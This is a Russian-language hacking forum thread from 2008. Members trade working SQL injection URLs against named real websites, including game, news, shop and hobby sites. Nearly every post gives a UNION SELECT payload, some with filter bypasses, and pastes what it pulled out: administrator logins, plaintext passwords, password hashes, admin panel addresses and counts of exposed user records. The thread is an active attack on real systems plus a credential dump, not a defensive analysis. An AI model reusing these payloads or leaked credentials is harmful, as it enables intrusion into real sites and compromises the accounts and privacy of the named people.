ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
25.04.2008, 09:25
|
|
Участник форума
Регистрация: 21.02.2008
Сообщений: 255
Провел на форуме:
975514
Репутация:
177
|
|
http://kb.arena.ru/kill.php?char=nickname'+UNION+SELECT+1,2--
кавычки экранируются слешем, ничего путного у меня не выходит(
может быть вы поможете?
функция char() отключена
|
|
|
25.04.2008, 10:34
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
imajo.ati
Там MSSQL т.е у тебя запрос изначально не верен
Вот версия
_http://kb.arena.ru/kill.php?char=nickname'%20or%201=@@version--
Дальше сам если надо
P.s Вопросы сдесь
_https://forum.antichat.ru/thread46016.html
|
|
|
|
25.04.2008, 14:09
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Сообщение от imajo.ati
кавычки экранируются слешем, ничего путного у меня не выходит(
может быть вы поможете?
функция char() отключена
imajo.ati
Там MSSQL т.е у тебя запрос изначально не верен
Вот версия
_http://kb.arena.ru/kill.php?char=nickname'%20or%201=@@version--
Дальше сам если надо
P.s Вопросы сдесь
_https://forum.antichat.ru/thread46016.html
Код:
http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+table_name+from+information_schema.tables)--
Получаем имя первой таблицы, через not+in+() получаем имена остальных таблиц, но так как стоит фильтр, то имена нужно кодировать, очень помог в этом Universal char SQL encoder by [53x]Shadow!
Таким образом находим таблицу tLogins, колонки стандартные - login, password, id.
Выводим результат:
Код:
http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+cast(login+as+nvarchar)%2Bcast(password+as+nvarchar)+from+tLogins)--
Логин и пароль сливаются, мускул ругается на +, ну впринцыпе и так покатит 
Так как все символы хэша не выводятся, сначала выводим первые 30, а потом с помощью команды substring(str,begin,length) - возвращает подстроку str, начиная с begin символа по счету длиной численно равной length, выводим недостающие 2 символа:
Код:
http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+cast(login+as+nvarchar)%2Bcast(substring(password,2,2)+as+nvarchar)+from+tLogins)--
Перебирать логины через where+id=... у меня не получилось, опять ругается мускул, альтернатива: +where+login+not+in(), логины опять же кодируем.
The End.
|
|
|
|
25.04.2008, 15:35
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
Код:
http://www.whiznews.com/article.php?articleId=999999999'/**/UNION/**/SELECT/**/1,2,unhex(hex(concat_ws(0x3a,user,password))),4/**/from/**/mysql.user/*
root:*044222DB9218BC78AACACF7654EA2B53ABCA925F
Код:
http://www.sydneyroosters.com.au/news.php?ArticleID=999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user,password),3,4/**/from/**/mysql.user/*
root:*6CBD12C8F805CFADB394E65458C4D9664F1866C6
cms_admin:378b243e220ca493
testing1:4ab87db330cd6bd5
root:*019BBA7CE94D4959118549E98F475D38EA733DA5 - хз откуда второй root
Код:
http://www.chipdesignmag.com/display.php?articleId=999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,unhex(hex(concat_ws(0x3a,user,password))),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/mysql.user/*
root:35976e334a7a830f
webadmin:48833ef87081f3cd
Код:
http://aainnovators.com/CMS/modules/wfsection/article.php?articleid=999999999/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/**/from/**/mysql.user+limit+0,1/*
admin:47fb196942cea04a
Код:
http://dailybeacon.utk.edu/showarticle.php?articleid=999999999/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12/**/from/**/mysql.user/*
root:49c206e707168c98
Код:
http://www.prowrestlingfans.com/inc/printArticle.php?articleID=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,concat_ws(0x3a,user,password),8,9,10,11/**/from/**/mysql.user/*
root:*FA3D9981B584530E38A1BEB14DB9B74CB19FE4AE
Код:
http://www.snegohod-buran.ru/shop.php?CID=999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user,password)/**/from/**/mysql.user+limit+1,1/*
5fb4ffc22deb3e8c:vavaha
Код:
http://www.bike.ru/shop.php?CID=999999999/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,user,password),4/**/from/**/mysql.user+limit+0,1/*
root:: |
|
|
|
25.04.2008, 16:16
|
|
Постоянный
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме:
4137635
Репутация:
2407
|
|
Имена, логины и пассы админов в открытом виде:
http://la2.ru/events/tournament/?id='%20union%20select%20name,concat(login, ':', pass)%20from%20admins/*
Админка тут: http://la2.ru/admin (у всех админов разные права)
|
|
|
|
25.04.2008, 20:59
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Поля в таблице Passwords
http://la2.ru/events/tournament/?id=-1'+union+select+column_name,2+from+information_sch ema.columns+where+table_name='passwords'/*
Окончательный список учёток и ниипёт:Р (Мошь надо кому было я хз,админки не тру  )).Вот ток XSS там валется куча(или одна бальшая),так шо будьте бдительны:Р
http://la2.ru/events/tournament/?id=-1'+union+select+concat_ws(0x3a,pw_id,pw_account,pw _pass,pw_email),2+from+passwords/* |
|
|
|
25.04.2008, 23:46
|
|
Новичок
Регистрация: 27.02.2008
Сообщений: 19
Провел на форуме:
34487
Репутация:
46
|
|
nerdpics.net
http://www.nerdpics.net/view.php?id='1
http://www.nerdpics.net/view.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9--
http://www.nerdpics.net/view.php?id=-1%20union%20select%201,concat(user(),0x3a,database (),0x3a,version()),3,4,5,6,7,8,9--
nerdpics@localhost:nerdpics:5.0.38-Ubuntu_0ubuntu1-log
http://www.nerdpics.net/view.php?id=-1%20union%20select%201,concat(table_schema,0x3a,ta ble_name,0x3a,column_name),3,4,5,6,7,8,9+from+info rmation_schema.columns+where+column_name+LIKE%20/**/0x257061737325/**/--
user:User:Password
|
|
|
|
26.04.2008, 17:54
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
www.policynetwork.net
http://www.policynetwork.net/main/article.php?article_id=-505+union+select+1,2,3,4,5,concat_ws(0x3a,admin_us ername,admin_password),7,8,9,0,1,2,3,4,5,6,7,8+fro m+admin/*
4.0.20-standard-log
http://www.policynetwork.net/admin
kendra:v0nhayek
philip:v0nhayek
alec:v0nhayek
mark:v0nhayek
dawn:v0nhayek
marcsidwell:3rdfloor
caroline:v0nhayek
================================================== ==
www.practicalfishkeeping.co.uk
http://www.practicalfishkeeping.co.uk/pfk/pages/item.php?news=-1588+union+select+concat_ws(0x3a,administrator,pas s)+from+emap.administrators+limit+0,1/*
Matt Clarke:twolbperch
Jayne Phillips:ilovedavidsaxby
Rebecca Mee:iamthemanagerofpets
steve:hockey1
Bev Pearce:cheesywotsits
kate:ilikedatabases
Hannah:bluebellpub
Gareth:monkeyflaps
ian:forest
colleen:hockey
http://www.practicalfishkeeping.co.uk/pfk/pages/item.php?news=-1588+union+select+concat_ws(0x3a,id,directory_name ,company_name,company_type,contact_name,job_title, contact_email,company_website,password)+from+emap. directory+limit+1145,1/*
~1150 юзверей ..
http://www.practicalfishkeeping.co.uk/pfk/pages/item.php?news=-1588+union+select+concat_ws(0x3a,username,password )+from+practical_fishkeeping.members_details+limit +58111,1/*
приличное кол-во юзверей .. ~ 58к ..
|
|
|
|
26.04.2008, 18:16
|
|
Новичок
Регистрация: 27.02.2008
Сообщений: 19
Провел на форуме:
34487
Репутация:
46
|
|
williampenn.net
http://www.williampenn.net/writinginstruments.php?cc=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21--
http://www.williampenn.net/writinginstruments.php?cc=-1%20union%20select%201,2,concat(user(),0x3a,databa se(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21--
williampenn_db@208.109.181.71:williampenn_db:5.0.4 5-log
http://www.williampenn.net/writinginstruments.php?cc=-1%20union%20select%201,2,concat(username,0x3a,pass word),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21+from+login_table--
admin:wponline
|
|
|
|
26.04.2008, 18:33
|
|
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070
Репутация:
173
|
|
http:// www.oqbo.ru/read.php?block=-99999+union+select+1,2,3,4,5,concat_ws(0x3a,user() ,version(),database()),7,8,9/*
USER: u71738@10.10.223.233
VERSION: 5.0.45-log
DATABASE: u71738_oqbo
Есть табла
wp_users
~id
~user_login
~user_pass
~user_nicename
~user_email
~user_url
~user_registered
~user_activation_key
~user_status
но доступа к ней похоже нету
****************************************
http:// pravostok.ru/ru/updates/index.php?from=10&id=-99999+union+select+1,2,concat_ws(0x3a,ADMINISTRATO R_ID,LOGIN,PASSWORD_MD5),4,5,6,7,8,9,10,11,12,13,1 4+from+ADMINISTRATOR/*
USER: pravostok@localhost
VERSION: 5.0.42
DATABASE: pravostok
ADMINISTRATOR
~ADMINISTRATOR_ID
~FIO
~LOGIN
~PASSWORD_MD5
~EMAIL
~IS_ROOT
~IS_LOCKED
~COUNT_BAD_ENTER
1:admin:b25483fbb2b1ed77fafbb0e7f42d1ea4
2:editor:911eb63cdea3eb02445404c5ef07d043
3: o_petr:92aff5dbd2bbe06c649e869f2135c720
4:news_editor:5b1620f0fbe4d77dcd8038bdf452aa24
5:editnews:e41edc7ad7e486391503ab6b0d474681
6:editij:59cd9699950909b9279715a812a06689
7:editornews:1f1c14601393842f6ad32c4dd275e235
8:wwww:e34a8899ef6468b74f8a1048419ccc8b(wwww)
Одминка тут: http://pravostok.ru/adm/
Последний раз редактировалось beerhack; 26.04.2008 в 18:39..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
